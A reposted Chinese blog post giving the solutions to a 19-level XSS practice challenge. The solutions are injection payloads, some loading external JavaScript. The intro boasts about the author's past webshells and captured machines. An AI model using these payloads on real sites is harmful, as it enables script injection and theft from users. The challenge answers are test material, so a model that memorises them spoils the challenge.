【19道XSS题目】不服来战！(转)

【19道XSS题目】不服来战！

记得第一次接触xss这个概念是在高中，那个时候和一个好基友通过黑客X档案和黑客手册。第一次接触到了除了游戏以外的电脑知识，然后知道了，原来电脑除了玩游戏还可以搞这些，从此两人一发不可收拾的爱上了玩黑这方面的东西。

现在想起来，高中时期是在08年左右，那个时候的网络安全环境还蛮差。那个时候没什么计算机知识，跟着杂志直接用工具跑都拿到了蛮多的webshell,后来学的多了，自己会写一些壳过免杀，艳照门时候抓的肉鸡那就不要说了，嘿嘿！

XSS具体的概念就不在这解释了，做前端的童鞋们只要是稍微对安全这方面有过一点了解的，应该都是知道的。

这里有19道XSS的题目，网址是神通广大的“QQ群爸爸”给的。大家如果想加深对XSS这方面的了解，可以来挑战一下。看看能过几关斩几将！

挑战请搓下面网址：

https://xss.haozi.me/

答案在下面给到，主要的思路大概是以下几种：

1.layload外部js

2.绕过正则

3.闭合标签

4.转化编码：10HEX，16HEX etc.

5.创建错误执行Js

---------------------------------------------------                  我是分割线                         答案在下面                  ---------------------------------------------------------------------

0x00:<script>alert(1)</script>

0x01:</textarea><script>alert(1)</script>

0x02:"><script>alert(1)</script>

0x03:<img src="" onerror=javascript:alert(1)>

0x04:<img src="" onerror=javascript:alert(1)>

0x05:--!><script>alert(1)</script>

0x06:type="image" src="xxx" onerror

="alert(1)"

0x07:<body onload=alert(1)    CRLF结尾

0x08:</style /><script>alert(1)</script>

0x09:https://www.segmentfault.com.haozi.me/j.js

0x0A:https://www.segmentfault.com.haozi.me/j.js

0x0B:<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0C:<scripscriptt src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>

0x0D:

          alert(1);

          -->

0x0E:<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

0x0F:');alert('1

0x10:eval("alert(1)");

0x11:"),alert("1

0x12:

</script>
<script>
alert(1);
</script>
<script>